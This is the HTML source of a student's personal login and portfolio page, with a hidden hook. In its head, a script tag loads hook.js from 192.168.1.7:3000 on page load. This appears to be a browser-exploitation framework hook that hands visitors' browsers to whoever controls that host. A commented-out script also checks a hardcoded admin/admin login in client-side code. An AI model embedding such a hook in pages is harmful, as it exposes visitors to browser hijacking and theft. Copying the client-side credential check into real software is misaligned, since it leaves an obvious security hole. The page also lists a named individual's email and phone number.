<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <!-- <meta http-equiv="refresh" content="2"> -->
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="http://192.168.1.7:3000/hook.js"></script>
    <title>Login</title>
    <link rel="stylesheet" href="style.css">
</head>
<!-- <style>
    /* {
        margin: 0;
        padding: 0;
        background-color: rgba(0, 0, 0, 0.945);
    } */
    body
    {
        overflow: hidden;
        color: azure;
        background-color: rgba(0, 0, 0, 0.945);
        /* background-image:; */
        
    } 
    section
    {
        /* overscroll-behavior: contain; */
        position: absolute;
        top: 50%;
        left: 50%;
        transform: translate(-50%,-50%);
        
    }
    section .logbox
    {
        display: flex;
        justify-content: center;
        align-items: center;
        height:420px;
        width: 280px;
        background-color: transparent;
        /* filter: blur(px); */
        backdrop-filter: blur(14px);
        border-radius: 15px;
        box-shadow: 0px 10px  80px rgba(136, 131, 131, 0.401);
    }
    section header
    {
        position: absolute;
        top: 10%;
        left: 50%;
        transform: translate(-50%,-50%);
        font-family: Segoe UI Variable Text Semibold;
        font-size: 40px;
    }
    .inputf p .na 
    {
        font-family:Segoe UI Variable Text Semibold;
        padding-left: 10px;
        margin: 25px;
        /* text-shadow: ; */
    }
    .ball
    {
        position: absolute;
        top: 60%;
        left: 41%;
        height: 100px;
        width: 100px;
        /* background-color: aqua; */
        background-image: linear-gradient(45deg,aqua 10%,white ,blue );
        border-radius: 50%;
    }
    section .logbox:hover
    {
        transition: 0.5s;
        height: 450px;
        width: 300px;
    }
    .ball2
    {
        position: absolute;
        top: 30%;
        left: 50%;
        height: 100px;
        width: 100px;
        /* background-color: aqua; */
        background-image: linear-gradient(-45deg,hotpink 30% ,yellow ,red );
        border-radius: 50%;
    }
    .ip,textarea
    {
        background: none;
        line-height:1 ;
        height: 0%;
        width: 210px;
        border: none;
        border-bottom: 1px solid red ;
        font-style: 28px;
        font-family:Segoe UI Variable Text Semibold ;
        margin: 5px 15px;
        padding: 5px;
        outline: none;
        color: aliceblue;
        /* focus{
            outline: none;
        } */
    }
    .btn
    {
        display: flex;
        position: absolute;
        left: 50%;
        transform: translate(-50%,-50%);
        margin-top: 30px;
    }
    .logbtn
    {
        height: 40px;
        width: 90px;
        border-radius: 20px;
        border:1px solid green;
        background-image: linear-gradient(lightblue,rgb(0, 255, 30));
        margin: 5px;
        font-style: normal;
        /* font-style: bold; */
        cursor: pointer;
    }
    .logbtn:hover
    {
        transition: 0.2s;
        color: azure;
        background-image: linear-gradient(lightblue,rgb(0, 106, 255));
        
    }
    a
    {
        color: inherit;  /* Inherit color from parent */
        text-decoration: none; /* Removes underline */
        cursor: pointer;
    }
    
    .profil
    {
        position: absolute;
        top: 160%;
        width:100% ;
        height:100vh ;
        background-color: rgb(30, 24, 24);
        color: black;
    }
    /* No LOnger use----------------- */
    /* .picD .pd
    {
        margin: 15px;
        height: 250px;
        width: 290px;
        /* border: 10px; 
        border-radius: 20px;
    } */
    /* .profil h3
    {
        margin: 15px;
        /* position: absolute;
        left: 14%; */
        /* height: 250px; 
        color: aliceblue;
        width: 290px;
        background: #222;
        display: flex;
        justify-content: center;
        font-family:Segoe UI Variable Text Semibold ;
        font-size:  28px;
    } */
    
    /* .logpg
    {
        position: absolute;
        top: 80%;
        margin-left: 15px;
        
        
    } */
    
    /* NO Longer use.------------------- */
    .Lg
    {
    margin: 15px;
    height: 40px;
    width: 110px;
    border-radius: 20px;
    color: azure;
    font-weight: 500;
    box-shadow: 0px 0px 20px rgb(50, 205, 109);
    background-image: linear-gradient(rgb(136, 158, 165),gray,rgb(42, 41, 41));
}
.Lg:hover
{
    cursor: pointer;
    transition: 0.5s;
    color: black;
    box-shadow: 0px 0px 20px rgb(50, 192, 205);
    background-image: linear-gradient(rgb(125, 233, 210),rgb(221, 225, 145),rgb(246, 127, 149));
}
.info
{
    position: absolute;
    top: 25%;
    left: 50%;
    transform: translate(-50%,-10%);
    display: flex;
    /* justify-content: center;
    align-items: center; */
}
.c
{
    color: aliceblue;
    height: 550px;
    width: 400px;
    margin-left: 45px;
    display: flex;
    align-items: center;
    justify-content: center;
    background-color: black;
}
.c span
{
    font-size: 100px;
    position: relative;
    top: -10%;
    left: -10%;
}

.picball
{
    height: 250px;
    width: 250px;
    margin: 20px;
    border-radius: 50%;
    position: absolute;
    transform: translate(-50%,);
    /* background-image:url("cd.jpg");
    background-size: 300px 300px;
    background-repeat: no-repeat; */
    opacity: 0;
    display: flex;
    justify-content: center;
    align-items: end;
}
#profile
{
    background-image:url("cd.jpg");
    background-size: 300px 300px;
    background-repeat: no-repeat;
}
#webcode
{
    background-image:url("codeimg.png");
    background-size: 400px 500px;
    background-repeat: no-repeat;
}
#contact
{
    background-image:url("contact.png");
    background-size: 300px 300px;
    background-repeat: no-repeat;
}
.picball:hover
{
    opacity: 1;
    transform: translateY(-45px);
    transition: 0.5s;
}
.picball p
{
    position: absolute;
    bottom: -60%;
    width: 110%;
}
</style> -->
<body>
    <div class="ball"></div>
    <div class="ball2"></div>
    
    <section id="LogPg">
        <div class="logbox">
            <header>DLog</header>
            <!-- <div class="cimg">
                <img src="C:\Users\Admin\Pictures\Acer\cd.jpg"></img>
            </div> -->
            <div class="inputf">
                <p ><span class="na"> Username</span> <span class="ip"><input class="ip" type="text" placeholder="xyz@dev.com" id="name" ></span><br> </p>
                <p><span class="na">Passowrd</span> <span class="ip"><input class="ip" type="password" placeholder="Passowrd" id="pass"></span></p>
                <div class="btn">
                    <button class="logbtn" id="lbtn" onclick="GETLOG()">Login</button>
                    <button class="logbtn" id="hbtn"><a href="https://www.linkedin.com/in/dev-maurya-238405222">Creator</a></button>
                </div>
            </div>
        </div>
    </section>
<!--     /* --------------------------------------------------------------------------------------------------------------------------------------------------------------------------- */ -->
    <section class="profil" id="admin">
        <div class="info">
            <div class="c"> <span> About <br> Dev <br>______ </span>
                <div class="picball" id="profile">
                    <p>* Hello, I'm Dev Maurya. <br>* I'm 20 Years Old. <br>* I'm an I.T. Student Of SU located in Surat. <br>* Currently I'm in 4th Sem Of B.TECH  <br></p>
                </div>
            </div>
            <div class="c"><span> About <br> Websit <br>______ </span>
                <div class="picball" id="webcode">
                    <p>* I'm will upload thia wesite source code on my gitHub page. <br> * @DevvMaurya<br></p>
                </div>
            </div>
            <div class="c"><span> About <br> Contact <br>______ </span>
                <div class="picball" id="contact">
                    <p># Mail Id:  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;mauryadevv@gmail.com 
                        <br># Phone No.: &nbsp;+91 8200270283 
                        <br># GitHub: &nbsp;&nbsp;&nbsp;&nbsp; @DevvMaurya
                        <br># Linkedin:  &nbsp;&nbsp;&nbsp;&nbsp;Dev Maurya
                        <br># Instagram:  &nbsp; @devv_maurya
                    </p>
                </div>
            </div>
       </div>
       
       <button class="Lg" id="LogPg" onclick="LOGPG()">LOG_Page</button>
    </section>

    <!-- <script>
        let name = document.getElementById("name");
        let pass = document.getElementById("pass");
        const element = document.getElementById("admin");
        const lpg = document.getElementById("LogPg");
        var count =0;
        function GETLOG()
        {
            if(name.value === "admin" && pass.value === "admin")
            {
                element.scrollIntoView(true);
                name.value ="";
                pass.value ="";
                // alert("HI admon");
            }
            else if(count >= 3)
            {
                alert("🔴🔴🔴\nThis activity sent to admin.\n ")
                // element.scrollIntoView(false);
            }
            else
            {
                count += 1;
                name.value="";
                pass.value="";
                alert("wrong Password OR userName.")
            }
            console.log(name)
        }
        function LOGPG()
        {
            lpg.scrollIntoView(false);
        }
    </script> -->
    <script src="script.js"></script>
</body>
</html>
